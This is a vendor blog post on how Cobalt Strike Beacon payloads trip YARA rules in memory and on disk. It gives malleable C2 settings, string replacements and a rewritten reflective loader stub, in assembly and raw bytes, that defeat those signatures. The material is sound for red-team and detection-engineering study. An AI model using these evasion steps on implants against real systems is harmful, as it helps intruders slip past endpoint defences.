Cobalt Strike and YARA: Can I Have Your Signature?

Over the past few years, there has been a massive proliferation of YARA signatures for Beacon. We know from conversations with our customers that this has become problematic when using Cobalt Strike for red team engagements and that there has been some confusion over how Cobalt Strike’s malleable C2 options can help.  
Therefore, this blog post will outline the OPSEC considerations when using Beacon with respect to in-memory YARA scanning and suggest a malleable C2 profile which should give robust evasion against these types of defensive techniques. 
As a TL;DR, to be OPSEC safe against in-memory YARA scanning you should: 

  • Ensure you are using the sleep mask and have enabled the evasive sleep found in the Arsenal kit (or alternatively use a modified/custom sleep mask) 
  • Enable stage.cleanup 
  • Strongly consider setting stage.obfuscate to true (or implement similar functionality in a UDRL) 
  • Be wary when using post-ex reflective DLLs (dependent on the security controls in place) as they currently fail to clean up memory and hence are ripe for signatures (we are working on fixing this) 

YARA Signatures

YARA rules are one of the quick wins for defenders attempting to obtain detection coverage for a given malware family. Once a sample is obtained, signatures can be quickly generated and then deployed at scale. Elastic has published an excellent blog on a methodology for doing this.

Typically, these rules/signatures are made up of either strings found in the target binary or static bytes identified from reversing specific functionality (e.g. XOR/encryption routines). Note that these rules can also be as simple as finding some arbitrary byte sequence that appears to be consistent between versions and that, when run against VirusTotal (e.g. via VTGrep: content:{4D 5A ...}), reliably identifies the target family. If this never changes between versions (unbeknownst to the operator), then it can provide a high-fidelity detection signature. 
This process becomes even more powerful when used in conjunction with in-memory scanning. Unless an implant takes evasive action, it is a sitting duck in memory (i.e. its .text / .data sections are plainly visible) and good YARA signatures will quickly identify it. Beacon in this sense is no different.

Furthermore, for Beacon specifically, there are countless open source (and no doubt many more private) YARA rules which are deployed by EDR vendors/threat hunters to quickly scan for and identify Beacons. As a result, this can make using Cobalt Strike a challenge for red team exercises unless extra precautions are taken. 

However, it is important to stress that low-cost detections are typically low cost to evade. YARA signatures generally can be thought of as having vast breadth but with limited depth (i.e. they are relatively quick and low cost to churn out/automate but have limited robustness for long term detection efficacy). With some basic adjustments to Beacon’s malleable C2 profile, it is possible to bypass YARA scanning with a high degree of confidence. Therefore, the aim of this blog post is to: 

  • Demonstrate Beacon’s susceptibility (in its default state) to YARA signatures. This will be illustrated initially via statically scanning a default Beacon payload on disk before considering in-memory YARA scanning.
  • Show how Cobalt Strike’s malleable C2 options can be configured to make in-memory YARA scanning redundant.  

As a note, this blog will primarily rely on Elastic’s open-source YARA rules for Cobalt Strike. This is because it was by far the most comprehensive collection of open-source YARA rules that we could find (and Elastic should be commended for being open and transparent in this regard). As such, this blog is not intended to be viewed as a guide in terms of how to “bypass” a specific vendor and it should be stressed that in-memory YARA scanning is likely to be only one component of a defence in depth strategy employed by EDRs (i.e. in conjunction with scanning for unbacked memory, anomalous threads, process injection, etc.). 

Lastly, it is important to note that as this blog is concerned with in-memory YARA scanning, all examples given are for raw Beacon DLL payloads. Hence, in this post we are assuming that Beacon has already been injected into memory via some form of Stage0 shellcode runner. Other payloads generated by Cobalt Strike (e.g. the default Cobalt Strike executables which are simple shellcode runners) have been included in the product for a number of years and as a result will be widely signatured too. However, they are out of scope for this blog post as the intention of the Arsenal kit is to facilitate modifying these executables to bypass signatures.

On-Disk YARA Scanning

To demonstrate the power of YARA signatures we can use Elastic’s open-source rules for Cobalt Strike and run them against a default raw HTTP Beacon DLL (on disk). As a note, this is a slightly contrived scenario, as typically when an exe/DLL is written to disk (or executed), an EDR will attempt to extract features and classify the binary via a PE malware model (although YARA could be used as well). This is a very different problem to get around and out of scope for this blog post, but see here for further reading. However, this first example is primarily designed to get an understanding of Beacon’s footprint in relation to YARA signatures before we consider the in-memory YARA scanning use case. 
We can run the Elastic Cobalt Strike YARA rules against a default raw Beacon DLL with the following command:

yara64.exe --print-strings Windows_Trojan_CobaltStrike.yar default_raw_beacon.dll

This generates five results:

1. Default strings found within Beacon.dll, as shown below (the corresponding YARA rule is Windows_Trojan_CobaltStrike_ee756db7):

Windows_Trojan_CobaltStrike_ee756db7 beacon_default_raw.dll

0x2cd60:$a39: %s as %s\%s: %d 
0x3c012:$a41: beacon.x64.dll 
0x2df70:$a46: %s (admin) 
0x2cec0:$a48: %s%s: %s 
0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 
0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 
0x2dfb9:$a51: Content-Length: %d

Strings are typically stored in the .data/.rdata section of a binary, and several of the strings shown above are clearly unique to Beacon.

2. An “unidentified” code fragment found within Beacon’s .text section (the corresponding YARA rule is Windows_Trojan_CobaltStrike_663fc95d):

Windows_Trojan_CobaltStrike_663fc95d beacon_default_raw.dll 

0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00

3. A code fragment from Beacon’s default sleep mask routine (the corresponding YARA rule is Windows_Trojan_CobaltStrike_b54b94ac):

Windows_Trojan_CobaltStrike_b54b94ac beacon_default_raw.dll 

0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03

Note that the sleep mask was not actually enabled for this Beacon payload. However, the default sleep mask is always patched into the .data section unless a custom one is specified.

4. A code fragment found within Beacon’s default exported reflective loader function (the corresponding YARA rule is Windows_Trojan_CobaltStrike_f0b627fc):

Windows_Trojan_CobaltStrike_f0b627fc beacon_default_raw.dll 

0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 
0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75

5. The reflective loader shellcode stub which is patched over the DOS header for Beacon (the corresponding YARA rule is Windows_Trojan_CobaltStrike_1787eef5):

Windows_Trojan_CobaltStrike_1787eef5 beacon_default_raw.dll 

0x0:$a5: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 89 DF 48 81 C3 3C 6E 01 00

For the last two hits (4 and 5), it is important to understand that Beacon is a reflectively loaded DLL. This means it has an exported reflective loader function within its .text section. Furthermore, so that it can be run directly from memory, a small shellcode stub is written over the start of the DOS header.  This small shellcode stub is responsible for jumping to the exported reflective loader function, which will then proceed to bootstrap Beacon into memory. For more context on reflective loading, see our blog post series on UDRL development and @0xBoku’s excellent blog on ‘Defining the Cobalt Strike Reflective Loader’. 
Unsurprisingly, these two components are very attractive signatures for defenders (and have additionally remained static for a number of years). The fourth result above targets arbitrary code found within the default reflective loader function. The offending code within ReflectiveLoader() is shown in IDA below (25FFFFFF00 disassembles to `and eax, 0xFFFFFF` etc.):

Figure 1. A screenshot from IDA showing the code fragment within the exported reflective loader function which the Windows_Trojan_CobaltStrike_f0b627fc rule triggers on.
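To make the byte-to-instruction mapping concrete, here is a minimal Python sketch that decodes the bytes matched by $beacon_loader_x64. It is not a general disassembler: it only understands the four opcode forms that occur in this fragment (`and eax, imm32`, `cmp eax, imm32`, `jne rel8` and `mov eax, [rsp+disp8]`), and the function name `decode` is our own.

```python
import struct

# Bytes matched by $beacon_loader_x64 in the scan output above.
SIGNATURE = bytes.fromhex(
    "25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 "
    "25 FF FF FF 00 3D 42 42 42 00 75"
)


def decode(code: bytes) -> list[str]:
    """Decode only the opcode forms that occur in SIGNATURE (illustrative)."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op in (0x25, 0x3D) and i + 5 <= len(code):
            # 25 id = AND EAX, imm32; 3D id = CMP EAX, imm32 (little-endian).
            (imm,) = struct.unpack_from("<I", code, i + 1)
            out.append(f"{'and' if op == 0x25 else 'cmp'} eax, {imm:#x}")
            i += 5
        elif op == 0x75 and i + 2 <= len(code):
            # 75 cb = JNE rel8 (the displacement here is positive).
            out.append(f"jne short +{code[i + 1]:#x}")
            i += 2
        elif code[i:i + 3] == b"\x8b\x44\x24" and i + 4 <= len(code):
            # 8B 44 24 xx = MOV EAX, [RSP + disp8]
            out.append(f"mov eax, [rsp+{code[i + 3]:#x}]")
            i += 4
        else:
            # The signature stops mid-instruction (a lone 75 opcode byte).
            out.append(f"<truncated or unhandled: {code[i:].hex(' ')}>")
            break
    return out


for line in decode(SIGNATURE):
    print(line)
```

The immediates 0x414141 and 0x424242 are simply the ASCII strings "AAA" and "BBB", which is part of what makes this fragment such a stable signature target.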

Google has published a similar YARA rule, and note that Windows Defender also contains signatures for Beacon’s default reflective loader. We can demonstrate this by running ThreatCheck against the same raw payload:

Figure 2. ThreatCheck.exe identifying signatured bytes found within a raw Beacon payload.

If we scan for this byte sequence in IDA, we find that it is code located within the ReflectiveLoader function:

Figure 3. A screenshot from IDA showing that the bytes identified by ThreatCheck.exe belong to the exported reflective loader function.

The fifth result above (Windows_Trojan_CobaltStrike_1787eef5) is a signature for Beacon’s default shellcode stub for bootstrapping reflective loading. Beacon’s default shellcode stub is displayed in PE-Bear below:

Figure 4. A screenshot from PE-Bear showing the default Beacon shellcode stub that is written over the DOS header.

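The Windows_Trojan_CobaltStrike_1787eef5 rule has one string condition ($a5) which is a fuzzy match for the first 32 bytes of this shellcode stub (`{ 4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? 48 89 DF 48 81 C3 ?? ?? ?? ?? }`). The `??` wildcards cover the instruction operands (the stack adjustment, the RIP-relative displacement, and the ReflectiveLoader offset), so the rule keeps matching even when those values differ between builds.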
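As a rough illustration of how such a wildcarded hex string behaves, the Python sketch below re-implements the matching by hand. It is a simplified stand-in for YARA's hex-string engine (it only supports whole-byte `??` wildcards), and the helper names `parse_pattern` and `find` are our own. The stub bytes are taken from the scan output above and the alternate stub from later in this post.

```python
from typing import Optional

# The $a5 pattern from Windows_Trojan_CobaltStrike_1787eef5.
PATTERN = (
    "4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? "
    "48 89 DF 48 81 C3 ?? ?? ?? ??"
)

# First 32 bytes of the default stub, as reported by the on-disk scan.
DEFAULT_STUB = bytes.fromhex(
    "4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF "
    "48 89 DF 48 81 C3 3C 6E 01 00"
)

# First 32 bytes of the alternate stub shown later in this post.
ALTERNATE_STUB = bytes.fromhex(
    "4D 5A 48 8D 1D F8 FF FF FF 41 52 48 83 EC 28 48 89 DF 48 81 C3 52 "
    "B7 00 00 48 81 C3 52 B7 00 00"
)


def parse_pattern(text: str) -> list[Optional[int]]:
    """Turn 'AA ?? BB' into [0xAA, None, 0xBB]; None means 'any byte'."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def find(data: bytes, pattern: list[Optional[int]]) -> int:
    """Return the first offset where pattern matches, or -1."""
    for off in range(len(data) - len(pattern) + 1):
        if all(p is None or data[off + i] == p for i, p in enumerate(pattern)):
            return off
    return -1


pattern = parse_pattern(PATTERN)
print(find(DEFAULT_STUB, pattern))    # matches at offset 0
print(find(ALTERNATE_STUB, pattern))  # no match: the fixed opcode bytes differ
```

The takeaway is that wildcards make the rule robust to operand changes but not to reordered or substituted instructions, since the fixed opcode bytes no longer line up.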

In-Memory YARA Scanning

Having looked at Beacon’s exposure to YARA for a default raw DLL payload located on disk, we can now turn to the problem this blog is concerned with: in-memory YARA scanning.  

The critical thing to understand with respect to in-memory YARA scanning is that when Beacon is reflectively loaded into memory it results in two memory allocations: the raw Beacon DLL (which will actually execute the shellcode stub and reflective loader function) and the virtual Beacon DLL (which is correctly loaded in memory and ready to go). Hence, the raw Beacon DLL will actually allocate memory (via the reflective loader function) for the virtual Beacon DLL and ensure it is correctly loaded. This is demonstrated in the image below:

Figure 5. A diagram showing the two memory allocations which occur as a result of the reflective loading process for a default Beacon payload. The first is Beacon in its raw/packed file format (‘Raw Beacon DLL’) and the second is Beacon after it has been correctly loaded into memory (‘Virtual Beacon DLL’).

Some of Cobalt Strike’s malleable C2 options patch/modify the raw Beacon DLL (e.g. stage.magic_mz_x64) whereas some change the behaviour of the reflective loader/how Beacon is loaded into memory (e.g. stage.obfuscate will not copy over the DLL headers to the virtual Beacon DLL, stage.stomppe will stomp values in the virtual Beacon DLL headers, etc.). The important point to stress is that depending on what malleable C2 options are set, these two memory allocations may trigger different YARA signatures and hence both need to be accounted for. 
It is clear from the diagram above that, in its default state, Beacon is a sitting duck once it has been injected into memory. Its reflective loader stub, code (.text section), and strings (.rdata/.data) are all clearly visible. This is demonstrated in the screenshot from Windbg below, which shows strings belonging to Beacon lurking in plain text in a memory region corresponding to the virtual Beacon DLL (RWX):

Figure 6. A screenshot from Windbg showing suspicious strings in memory belonging to the virtual Beacon DLL. These would trivially be found by in-memory YARA scanning.

Furthermore, because of the two allocations corresponding to the raw and virtual DLL, all these sensitive regions are actually stored in memory twice. Hence, if we run the same set of YARA rules against a process that has a default Beacon injected into it, we will get the same YARA hits as before except this time there will be duplicates. These duplicate results will correspond to the same strings/bytes being found within the raw Beacon DLL and the virtual Beacon DLL. 
The screenshot below from Windbg shows the two suspicious memory regions (corresponding to the raw Beacon DLL and the virtual Beacon DLL) which are a result of Beacon being injected into memory. These are both identifiable via the same DLL header (MZARUH..) which is the start of the default reflective loader stub.

Figure 7. A screenshot from Windbg showing the two memory regions which result from reflectively loading a default Beacon payload. The RWX memory region corresponds to the virtual Beacon DLL and the RX region corresponds to the raw Beacon DLL.

The image below shows the output of running YARA against this process memory address space (PID 3204). Notice that we get two hits for each rule, which correspond to the two memory regions highlighted above in Windbg:

Figure 8. The results of running the Elastic Cobalt Strike YARA rules against a process with a default Beacon injected into it. Because Beacon is, by default, written to memory twice (raw Beacon DLL and virtual Beacon DLL), we get duplicate results for each triggering YARA rule.
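The duplicate hits can be modelled with a toy Python sketch. The region names and contents below are hypothetical stand-ins (a real scanner walks the committed pages of the target process, and offsets differ between the raw and virtual layouts), but the logic is the same: every region that still holds Beacon's bytes yields its own hit.

```python
from typing import Iterator

NEEDLE = b"beacon.x64.dll"  # one of the default strings flagged earlier


def scan(regions: dict[str, bytes], needle: bytes) -> Iterator[tuple[str, int]]:
    """Yield (region name, offset) for every occurrence of needle."""
    for name, data in regions.items():
        off = data.find(needle)
        while off != -1:
            yield name, off
            off = data.find(needle, off + 1)


# Hypothetical stand-in for Beacon's bytes; not a real payload.
image = b"\x00" * 16 + NEEDLE + b"\x00" * 16

regions = {
    "raw Beacon DLL (RX)": image,
    "virtual Beacon DLL (RWX)": image,
}

hits = list(scan(regions, NEEDLE))
print(hits)  # one hit per region, i.e. two hits for a single rule string

# Once the raw allocation has been freed, only one copy remains to be found.
remaining = {k: v for k, v in regions.items() if not k.startswith("raw")}
print(list(scan(remaining, NEEDLE)))
```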

Lastly, once Beacon is up and running, also be aware that its run time behaviour can increase its in-memory footprint. A good example to demonstrate this is BeaconEye, which uses signatures to identify Beacon by scanning for its configuration in heap memory.

YARA OPSEC Considerations for Beacon

The examples above demonstrate that, in its default state, there is an extremely low barrier to detecting Beacon in memory via YARA scanning. Furthermore, there are a multitude of YARA signatures targeting different sections of the Beacon DLL, i.e. the reflective loader stub/DLL headers, code fragments found within the .text section, strings found in its data sections and so on. As operators, this is obviously something that we need to address, and at this point we can start to explore how to configure Beacon’s malleable C2 options so that we can bypass this entire class of detections.


Strrep

As a basic ‘evasion in depth’ approach it is always sensible to remove obviously suspicious strings found within Beacon’s reflective DLL (“beacon.x64.dll”, “ReflectiveLoader”, etc.). We can do this with the strrep command, which will replace a string/set of bytes within Beacon’s reflective DLL. However, note that some strings identified by YARA above are Beacon format strings (“%s%s: %s”) that are currently required to return data and so replacing these may cause undefined behaviour. 
As a demonstration of how brittle YARA signatures can be though, we can make some minor modifications to our malleable C2 profile to bypass the Windows_Trojan_CobaltStrike_ee756db7 rule that identifies default strings found within Beacon. This rule requires six suspicious strings to be identified, as the excerpt below shows:

        $a50 = "%02d/%02d/%02d %02d:%02d:%02d" ascii fullword
        $a51 = "Content-Length: %d" ascii fullword
        6 of ($a*)

By making the following modification to our malleable C2 profile we can bypass this rule:

stage { 
    transform-x64 { 
        strrep "(admin)" "(adm)";
        # If you modify these ensure you keep format string order
        strrep "%s as %s\\%s: %d" "%s - %s\\%s: %d";
    }
}

Generally though, as we can’t modify all of these default strings without causing issues, the real solution to suspicious strings is to use the sleep mask kit (which we will discuss shortly).
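To see why two small strrep changes are enough to defeat a `6 of ($a*)` condition, here is a hedged Python model of the rule. It only includes the six `$a` strings that appeared in the scan output earlier (the real rule defines many more), it ignores the `fullword` modifier, and the `strrep` helper is our own approximation that pads the replacement with NUL bytes so the data length does not change.

```python
# The six $a strings that matched in the on-disk scan output.
RULE_STRINGS = {
    "$a39": b"%s as %s\\%s: %d",
    "$a41": b"beacon.x64.dll",
    "$a46": b"%s (admin)",
    "$a48": b"%s%s: %s",
    "$a50": b"%02d/%02d/%02d %02d:%02d:%02d",
    "$a51": b"Content-Length: %d",
}
THRESHOLD = 6  # from the rule condition: 6 of ($a*)


def strrep(data: bytes, old: bytes, new: bytes) -> bytes:
    """Approximate strrep: same-length replacement, NUL-padded (assumption)."""
    if len(new) > len(old):
        raise ValueError("replacement must not be longer than the original")
    return data.replace(old, new.ljust(len(old), b"\x00"))


def matched(data: bytes) -> set[str]:
    """Return the identifiers of the rule strings present in data."""
    return {name for name, s in RULE_STRINGS.items() if s in data}


def rule_fires(data: bytes) -> bool:
    return len(matched(data)) >= THRESHOLD


# Hypothetical stand-in for Beacon's string table.
default = b"\x00".join(RULE_STRINGS.values())

modified = strrep(default, b"(admin)", b"(adm)")
modified = strrep(modified, b"%s as %s\\%s: %d", b"%s - %s\\%s: %d")

print(sorted(matched(default)), rule_fires(default))
print(sorted(matched(modified)), rule_fires(modified))
```

In this model the default data matches all six strings, whereas the modified data matches only four, so the threshold is no longer met even though most of the strings are untouched.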

Stage.magic_mz_* / Stage.magic_pe_*

The ‘magic_mz_*’ / ‘magic_pe_*’ options patch the MZ and PE characters respectively in Beacon’s raw DLL. The exported reflective loader function will use these magic bytes to locate itself in memory, so this option will also modify the reflective loader. Note that as these are located in the DLL headers, they will be copied over to the virtual Beacon DLL during the reflective loading process.

As a word of caution, for the magic_mz_* option, the value provided must be valid (no-)op codes as they are the first instructions that will be executed as part of the shellcode stub. Typically, this would be some variant of `pop regA, push regA` as the latter instruction undoes the first, but see here for more guidance on configuring this option. 
These options are typically used to frustrate memory scanners trying to identify injected DLLs, however magic_mz could be used to break basic YARA signatures on the reflective loader stub. As an example, modifying the MZ bytes (4D 5A) would break this signature. However, our freedom of movement is limited as we can only modify a few bytes in each case, so clearly more robust YARA signatures would still trigger.


Stage.cleanup

This is a key option and should be set to true wherever possible. As we have previously demonstrated, the initial memory allocation of the raw Beacon DLL contains several highly signaturable components (e.g. the reflective loader stub, the exported reflective loader function, etc.). Furthermore, once it has bootstrapped Beacon it is no longer needed. By setting the ‘cleanup’ option to true, Beacon will free this memory and dramatically lower its in-memory footprint (hence only the virtual Beacon DLL will remain). Additionally, the clean-up operation is smart enough to identify how the memory was allocated initially and free it accordingly. 
Note that if for some reason you cannot use cleanup, this BOF by @S4ntiagoP demonstrates how you can manually clean up memory.


Stage.stomppe

Even if we have set cleanup to true, the DLL headers are still copied over to the virtual Beacon DLL and hence are a target for in-memory scanning. The stomppe option will ensure the MZ/PE and e_lfanew values are stomped in the virtual Beacon DLL during the reflective loading process. This again makes it harder for memory scanners to identify whether there is an injected DLL in memory, and could also help break any YARA signatures targeting Beacon’s DOS header (although this option is similar to magic_mz/pe in that it has limited freedom of movement for the YARA use case).


Stage.obfuscate

We can go one better and ask the reflective loader to copy Beacon over without its DLL headers. This can be achieved with the ‘stage.obfuscate’ flag. Enabling this, along with cleanup, means the reflective loader stub can no longer be found in-memory. 
Additionally, stage.obfuscate will also mask Beacon’s: 

  • .text section 
  • Section names 
  • Import table 
  • Dos/Rich Header (this is technically not masked but overwritten with random data)

As of 4.8, stage.obfuscate moved from a fixed single byte XOR key to a randomly generated multi-byte XOR key. This is particularly useful from an evasion perspective because YARA contains a xor modifier which will brute force single byte XOR’d strings. As an example, here is a YARA rule which looks for XOR’d strings in Beacon. 
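The difference between the two key types can be shown with a short Python sketch. It approximates what YARA's xor modifier does (try every single-byte key against the string) and is not YARA's actual implementation; the key values and the `brute_force_single_byte` helper are arbitrary choices for illustration.

```python
from itertools import cycle
from typing import Optional


def xor(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def brute_force_single_byte(buf: bytes, needle: bytes) -> Optional[int]:
    """Try all 256 single-byte keys, as the xor modifier effectively does."""
    for k in range(256):
        if xor(needle, bytes([k])) in buf:
            return k
    return None


needle = b"beacon.x64.dll"
plain = b"\x00\x00" + needle  # hypothetical buffer containing the string

single = xor(plain, b"\x5a")             # fixed single-byte key
multi = xor(plain, b"\x13\x37\xc0\xde")  # multi-byte key (arbitrary example)

print(brute_force_single_byte(single, needle))  # the key is recovered
print(brute_force_single_byte(multi, needle))   # None: no single byte fits
```

A single-byte key only gives a scanner 256 candidates to check per string, which is cheap. With a randomly generated multi-byte key no single candidate decodes the whole string, so this style of rule stops matching.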

Stage.obfuscate is demonstrated in the screenshot from PE-Bear below, which compares a default Beacon to one with obfuscation enabled (notice the different DOS headers and masked/XOR’d section names): 

Figure 9. A screenshot from PE-Bear showing a comparison of an obfuscated Beacon DLL vs a default Beacon DLL.

The required sections will then be unmasked during the reflective loading process. Hence this will break some YARA signatures on the raw/static Beacon DLL, but not once it has been loaded into memory (i.e. rules for code fragments in the .text section will still hit on the virtual Beacon DLL). This is demonstrated (at a high level) below:

Figure 10. A diagram showing the two memory allocations which occur as a result of the reflective loading process for an obfuscated Beacon payload. Note, that as well as the masking on the raw Beacon DLL, the Virtual Beacon DLL does not have any DLL headers.

Also note that, as this diagram suggests, some things are still not masked in the raw Beacon DLL even when obfuscate is enabled: 

  • Reflective loader stub 
  • Exported reflective loader function 
  • Sleep mask 
  • Strings 

Hence, even an obfuscated Beacon payload will still trigger the same YARA rules identified previously for each of these respective components. One way to address this limitation is via implementing custom obfuscation in a UDRL. This topic will be covered in much more detail in the next part of our UDRL development blog series.
Lastly, also bear in mind that the obfuscation applied to Beacon might make it look (more) suspicious to PE malware models if dropped to disk (i.e. the sketchy section names, higher entropy of some sections, etc. will all make it look more anomalous).

Modifying The Reflective Loader Stub

It should be clear by now that the default Cobalt Strike reflective loader stub is an obvious target for YARA signatures. However, it is possible to create our own DOS stub and apply it to Beacon payloads via the `stage.transform` block. Note that this example will only consider X64 payloads. 
The default 64 bit DOS stub used by Beacon is shown (and explained) below:

pop r10                ; MZ Header 
push r10               ; undo action above 
push rbp               ; save the stack base pointer 
mov rbp, rsp           ; create a new stack frame 
sub rsp, 0x20          ; create shadow space (x64 __fastcall) 
lea rbx, [rip - 0x16]  ; obtain shellcode base address 
mov rdi, rbx           ; save shellcode base address 
add rbx, 0x16EA4       ; add file offset of ReflectiveLoader to shellcode base 
call rbx               ; call ReflectiveLoader (returns DllMain address) 
mov r8d, 0X56A2B5F0    ; EXITFUNC value 
push 4                 ; push 4 to stack 
pop rdx                ; pop the value into rdx (second argument of call) 
mov rcx, rdi           ; move shellcode base address to rcx (first argument of call) 
call rax               ; call DllMain 

The following example is an alternate version of the stub described above:

pop r10               ; MZ Header 
lea rbx, [rip -0x08]  ; obtain the shellcode base address 
push r10              ; undo action of MZ header 
sub rsp, 0x28         ; create shadow space and align stack 
mov rdi, rbx          ; save shellcode base address 
add rbx, 0xb752       ; add half file offset of ReflectiveLoader to shellcode base  
add rbx, 0xb752       ; add half file offset of ReflectiveLoader to shellcode base 
call rbx              ; call ReflectiveLoader (returns DllMain address) 
mov rdx, 0x04         ; move 4 into rdx (second argument of call) 
mov rcx, rdi          ; move shellcode base address to rcx (first argument of call) 
call rax              ; call DllMain 

Note that the default ReflectiveLoader will actually call DllMain itself and return the address of DllMain to the shellcode stub. We then call DllMain a second time to start Beacon. This is why you may see two calls to DllMain in open source UDRLs. 
This stub performs similar steps but with some instruction substitution and in a slightly different order (with the exception of setting the EXITFUNC value, which is not technically required). Furthermore, there are many other ways of using instruction substitution to achieve a similar effect. For example, every `mov regA, regB` could be substituted as `push regB; pop regA` or `mov tmp, regB; mov regA, tmp` etc. Alternatively, a more automated approach could be to use something like Nettitude’s Shellcode Mutator. This does not actually mutate instructions per se (it randomly adds in no-ops to existing shellcode) but it could also be used to break YARA signatures. 
In the screenshot below, we’ve assembled the alternate shellcode stub above:

Figure 11. A screenshot showing the assembled code of our modified shellcode stub which will overwrite the DOS header.

As a note, for complicated instruction encoding reasons, `pop r10` actually assembles to 41 5A, so you will need to manually change “\x41\x5A” back to “\x4D\x5A” at the start of the string literal (4D 5A still disassembles as `pop r10`). This is because the default reflective loader hunts backwards for the MZ header (i.e. 4D 5A) and so will fail if it can’t find it.  
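The encoding detail can be unpacked with a small Python sketch. For the one-byte `pop r64` form (opcode 58+rd), only the REX.B bit is used to select the extended registers r8 to r15; the other REX bits set in 0x4D (W and R) have no effect on this instruction. The decoder below handles only this single instruction form and `decode_pop` is our own helper name.

```python
REG64 = [
    "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
]


def decode_pop(code: bytes) -> str:
    """Decode a REX-prefixed 'pop r64' (opcode 58+rd). Nothing else."""
    rex, opcode = code[0], code[1]
    if rex & 0xF0 != 0x40 or not 0x58 <= opcode <= 0x5F:
        raise ValueError("not a REX-prefixed pop r64")
    rex_b = rex & 0x01  # REX.B extends the register number by 8
    return f"pop {REG64[(rex_b << 3) | (opcode - 0x58)]}"


print(decode_pop(bytes.fromhex("41 5A")))  # what an assembler emits
print(decode_pop(bytes.fromhex("4D 5A")))  # the 'MZ' magic bytes
```

Both byte sequences decode to `pop r10`, which is why swapping 41 back to 4D keeps the stub executable while preserving the MZ magic.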
It is possible to modify the default DOS stub and use our updated version with strrep in the malleable C2 profile, as demonstrated below:

stage { 
     transform-x64 { 
          strrep "\x4D\x5A\x41\x52\x55\x48\x89\xE5\x48\x81\xEC\x20\x00\x00\x00\x48\x8D\x1D\xEA\xFF\xFF\xFF\x48\x89\xDF\x48\x81\xC3\xA4\x6E\x01\x00\xFF\xD3\x41\xB8\xF0\xB5\xA2\x56\x68\x04\x00\x00\x00\x5A\x48\x89\xF9\xFF\xD0" "\x4D\x5A\x48\x8D\x1D\xF8\xFF\xFF\xFF\x41\x52\x48\x83\xEC\x28\x48\x89\xDF\x48\x81\xC3\x52\xB7\x00\x00\x48\x81\xC3\x52\xB7\x00\x00\xFF\xD3\x48\xC7\xC2\x04\x00\x00\x00\x48\x89\xF9\xFF\xD0"; 
     }
}

After restarting the Teamserver with the above strrep included within our profile, we can see that the new DOS stub has been applied to our exported Beacon payload:

Figure 12. A side by side comparison of the default Beacon shellcode stub (on the left) vs our modified shellcode stub (on the right) for an exported raw Beacon payload.

In the screenshot below, we have used a utility from the udrl-vs kit to inject the raw Beacon payload (i.e. beacon.bin) with the modified DOS header into memory to test that it works as expected:

Figure 13. An example using a utility located in the udrl-vs kit to execute our raw Beacon DLL with the modified DOS header to confirm it works as expected.

As a note, to be compatible with the default reflective loader, the reflective loader stub needs to do four things: 
1. Obtain the shellcode base address (i.e. start of the MZ header). 
2. Calculate the offset to the exported ReflectiveLoader function from the shellcode base. 
3. Call ReflectiveLoader(). 
4. Call DllMain with the shellcode base address as the hinstDLL parameter (first argument/rcx) and 4 as the reason code parameter (second argument/rdx). Note that the third argument isn’t required. 
As long as you perform these steps, you can add whatever code you like to get Beacon up and running. However, you should try and restrict the size of the shellcode stub to 59 bytes or else you may crash Beacon. This is because after this point you will overwrite the value of e_lfanew (which is located at 0x3C/60 in the DOS header). The value of e_lfanew is required by the reflective loader to hunt backwards in memory for the MZ & PE headers and so if you blitz this it will fail. 
Lastly, as the magic_mz option also modifies the start of the DOS stub (and in turn what bytes the reflective loader looks for) it is incompatible with (and will supersede) the strrep approach outlined here. 
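Before putting a custom stub into a profile, it can be worth sanity-checking it against the constraints above. The Python sketch below is one hedged way of doing so: the 59-byte limit and the 0x3C offset of e_lfanew come from the text, the two byte strings are copied from the strrep example, and `check_stub` is a hypothetical helper that only covers these structural checks (it does not verify that the code itself is correct).

```python
E_LFANEW_OFFSET = 0x3C  # e_lfanew lives at offset 0x3C (60) in the DOS header
MAX_STUB_LEN = 59       # size limit suggested in the text

# Default and alternate stubs, copied from the strrep example above.
DEFAULT_STUB = bytes.fromhex(
    "4D5A4152554889E5 4881EC20000000 488D1DEAFFFFFF 4889DF 4881C3A46E0100 "
    "FFD3 41B8F0B5A256 6804000000 5A 4889F9 FFD0"
)
ALTERNATE_STUB = bytes.fromhex(
    "4D5A 488D1DF8FFFFFF 4152 4883EC28 4889DF 4881C352B70000 "
    "4881C352B70000 FFD3 48C7C204000000 4889F9 FFD0"
)


def check_stub(stub: bytes) -> list[str]:
    """Return a list of problems; an empty list means the checks passed."""
    problems = []
    if not stub.startswith(b"MZ"):
        problems.append("stub must start with 4D 5A for the default loader")
    if len(stub) > MAX_STUB_LEN:
        problems.append(
            f"stub is {len(stub)} bytes and risks overwriting e_lfanew "
            f"at {E_LFANEW_OFFSET:#x}"
        )
    return problems


for name, stub in (("default", DEFAULT_STUB), ("alternate", ALTERNATE_STUB)):
    print(name, len(stub), check_stub(stub) or "ok")

# The alternate stub adds the ReflectiveLoader offset in two halves.
print(hex(0xB752 + 0xB752))  # equals the single 0x16EA4 add in the default stub
```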

Sleep Mask

